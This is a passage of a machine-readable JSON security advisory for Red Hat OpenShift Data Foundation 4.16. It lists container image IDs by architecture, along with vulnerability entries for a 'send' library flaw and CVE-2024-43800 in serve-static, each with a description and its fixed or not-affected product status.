"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "rhdh-hub-container 1.2 and 1.3 have included patches for this vulnerability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"known_not_affected": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
